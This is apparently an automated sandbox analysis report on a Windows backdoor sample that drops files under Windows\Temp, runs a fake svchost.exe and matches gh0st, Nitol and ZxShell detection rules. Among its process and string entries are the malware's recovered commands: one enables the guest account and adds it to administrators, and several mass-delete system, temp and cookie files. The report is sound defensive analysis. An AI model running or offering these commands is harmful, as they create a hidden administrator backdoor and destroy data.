Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003EA80	8_2_1003EA80
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10054ABB	8_2_10054ABB
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100312D0	8_2_100312D0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003A2D0	8_2_1003A2D0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1002E2E0	8_2_1002E2E0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10032AE0	8_2_10032AE0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001E2F0	8_2_1001E2F0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100682F0	8_2_100682F0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10037B10	8_2_10037B10
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003C310	8_2_1003C310
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003BB20	8_2_1003BB20
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1004A320	8_2_1004A320
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10041B20	8_2_10041B20
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10030B40	8_2_10030B40
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1004F34F	8_2_1004F34F
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1002C350	8_2_1002C350
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10017360	8_2_10017360
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10038360	8_2_10038360
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001D370	8_2_1001D370
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003D390	8_2_1003D390
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001ABA0	8_2_1001ABA0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100393A0	8_2_100393A0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100563A0	8_2_100563A0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1004FBC5	8_2_1004FBC5
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1004B3C0	8_2_1004B3C0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100233F0	8_2_100233F0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003DBF0	8_2_1003DBF0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100413F0	8_2_100413F0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10053418	8_2_10053418
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1005141B	8_2_1005141B
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10042420	8_2_10042420
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001543E	8_2_1001543E
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10040C40	8_2_10040C40
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10034C70	8_2_10034C70
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001C480	8_2_1001C480
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001ACA0	8_2_1001ACA0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100364B0	8_2_100364B0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1002DCC0	8_2_1002DCC0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10035CC0	8_2_10035CC0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100554E0	8_2_100554E0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100334F0	8_2_100334F0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100544FD	8_2_100544FD
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003AD00	8_2_1003AD00
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10015D10	8_2_10015D10
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001CD20	8_2_1001CD20
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10035540	8_2_10035540
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003FD40	8_2_1003FD40
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10034560	8_2_10034560
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1002C570	8_2_1002C570
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10051DC7	8_2_10051DC7
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003CDC0	8_2_1003CDC0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100415C0	8_2_100415C0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100145D0	8_2_100145D0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1004A5D0	8_2_1004A5D0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10016DE0	8_2_10016DE0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10039DE0	8_2_10039DE0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1004CDE0	8_2_1004CDE0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100505F7	8_2_100505F7
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10041DF0	8_2_10041DF0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10040E00	8_2_10040E00
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10037E10	8_2_10037E10
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10038610	8_2_10038610
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001DE40	8_2_1001DE40
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001D650	8_2_1001D650
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10038E50	8_2_10038E50
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10022E60	8_2_10022E60
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10064E70	8_2_10064E70
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001568D	8_2_1001568D
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003B690	8_2_1003B690
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003C6A0	8_2_1003C6A0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100656D0	8_2_100656D0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10066EE0	8_2_10066EE0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10033EF0	8_2_10033EF0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003F700	8_2_1003F700
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10057F20	8_2_10057F20
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10013730	8_2_10013730
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10063F30	8_2_10063F30
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10063760	8_2_10063760
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10046F90	8_2_10046F90
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10040FC0	8_2_10040FC0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001BFD0	8_2_1001BFD0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003A7D0	8_2_1003A7D0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100287F0	8_2_100287F0

Source: C:\Windows\Temp\ .exe	Code function: String function: 00401B10 appears 2588 times
Source: C:\Windows\Temp\ .exe	Code function: String function: 0044991C appears 59 times
Source: C:\Windows\Temp\ .exe	Code function: String function: 00456F8E appears 53 times
Source: C:\Windows\Temp\ .exe	Code function: String function: 00454F3B appears 2661 times
Source: C:\Windows\Temp\ .exe	Code function: String function: 00459697 appears 31 times
Source: C:\Windows\Temp\ .exe	Code function: String function: 004483B0 appears 122 times

Source: G3izWAY3Fa.exe, 00000000.00000002.1327850381.000000000297D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystemTool.exe8 vs G3izWAY3Fa.exe
Source: G3izWAY3Fa.exe, 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSystemTool.exe8 vs G3izWAY3Fa.exe

Source: G3izWAY3Fa.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: dump.pcap, type: PCAP	Matched rule: gh0st author = https://github.com/jackcr/
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: ZxShell_Related_Malware_CN_Group_Jul17_2 date = 2017-07-08, hash1 = 204273675526649b7243ee48efbb7e2bc05239f7f9015fbc4fb65f0ada64759e, author = Florian Roth, description = Detects a ZxShell related sample from a CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: ZxShell_Related_Malware_CN_Group_Jul17_2 date = 2017-07-08, hash1 = 204273675526649b7243ee48efbb7e2bc05239f7f9015fbc4fb65f0ada64759e, author = Florian Roth, description = Detects a ZxShell related sample from a CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 00000003.00000002.2681095838.0000000000650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: gh0st author = https://github.com/jackcr/
Source: 00000003.00000002.2705358503.0000000002A5D000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY	Matched rule: gh0st author = https://github.com/jackcr/

Source: v5.exe, 00000002.00000002.1330252488.000000000075A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: u.sLN

Source: classification engine

Classification label: mal84.spre.bank.troj.spyw.evad.winEXE@113/11@12/4

Source: C:\Windows\Temp\server.exe	Code function: 3_2_10011F80 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,	3_2_10011F80
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0043A410 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,InitiateSystemShutdownA,	5_2_0043A410
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0043A500 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	5_2_0043A500
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0043AD30 MessageBoxA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	5_2_0043AD30
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0043ADF0 MessageBoxA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	5_2_0043ADF0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10011F80 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,	8_2_10011F80

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

Code function: 0_2_004041CD GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004041CD

Source: C:\Windows\Temp\server.exe

Code function: 3_2_100018A0 wsprintfA,CreateToolhelp32Snapshot,Process32First,_strcmpi,GetCurrentProcessId,OpenProcess,GetModuleFileNameExA,K32GetModuleFileNameExA,_strcmpi,CloseHandle,Process32Next,CloseHandle,

3_2_100018A0

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

Code function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,

0_2_00402020

Source: C:\Windows\Temp\v5.exe

Code function: 2_2_00405244 LoadLibraryA,6D0C6DE0,FindResourceA,LoadResource,LockResource,wsprintfA,WriteFile,WriteFile,SetFilePointer,lstrlen,WriteFile,CloseHandle,

2_2_00405244

Source: C:\Windows\Temp\v5.exe

Code function: 2_2_0040597D WSAStartup,StartServiceCtrlDispatcherA,ExitProcess,

2_2_0040597D

Source: C:\Windows\Temp\v5.exe	Code function: 2_2_0040597D WSAStartup,StartServiceCtrlDispatcherA,ExitProcess,		2_2_0040597D
Source: C:\Windows\Temp\v5.exe	Code function: 4_2_0040597D WSAStartup,StartServiceCtrlDispatcherA,ExitProcess,		4_2_0040597D

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2376:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7008:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5420:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03
Source: C:\Windows\SysWOW64\033726\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\AAAAAA9PT0vfT4rqenp70A/Pqpp6+vr58= BBBBBB9PT0vf4Fr7K0sr0A/Pqpp6+vr58= CCCCCC9PT0vQXpr7K0sr0A/Pqpp6+vr58= GGGGGG4wIF/vL7858= XXXXXX579E5A5B VVVVVVrr2unw==
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2524:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:604:120:WilError_03
Source: C:\Windows\Temp\server.exe	Mutant created: \Sessions\1\BaseNamedObjects\AAAAAArrGvvbOnvbCzvbGwsKmnr6+vnw==
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6908:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7224:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4084:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
Source: C:\Windows\Temp\v5.exe	Mutant created: \BaseNamedObjects\Defghi Klmnopqr Tuv
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:660:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2440:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1044:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3736:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2148:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3280:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5764:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5856:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7232:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1380:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1816:120:WilError_03

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

File created: C:\Users\user\AppData\Local\Temp\nswC4F8.tmp

Jump to behavior

Source: G3izWAY3Fa.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: G3izWAY3Fa.exe	Virustotal: Detection: 70%
Source: G3izWAY3Fa.exe	ReversingLabs: Detection: 86%

Source: server.exe	String found in binary or memory: cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add
Source: svchost.exe	String found in binary or memory: cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

File read: C:\Users\user\Desktop\G3izWAY3Fa.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\G3izWAY3Fa.exe "C:\Users\user\Desktop\G3izWAY3Fa.exe"
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process created: C:\Windows\Temp\v5.exe "C:\Windows\temp\v5.exe"
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process created: C:\Windows\Temp\server.exe "C:\Windows\temp\server.exe"
Source: unknown	Process created: C:\Windows\Temp\v5.exe C:\Windows\temp\v5.exe
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process created: C:\Windows\Temp\ .exe "C:\Windows\temp\ .exe"
Source: C:\Windows\Temp\v5.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\server.exe	Process created: C:\Windows\SysWOW64\033726\svchost.exe "C:\Windows\system32\033726\svchost.exe"
Source: C:\Windows\SysWOW64\033726\svchost.exe	Process created: C:\Windows\SysWOW64\034031\svchost.exe "C:\Windows\system32\034031\svchost.exe"
Source: unknown	Process created: C:\Windows\XXXXXX05CA35CC\svchsot.exe "C:\Windows\XXXXXX05CA35CC\svchsot.exe"
Source: unknown	Process created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe "C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe"
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
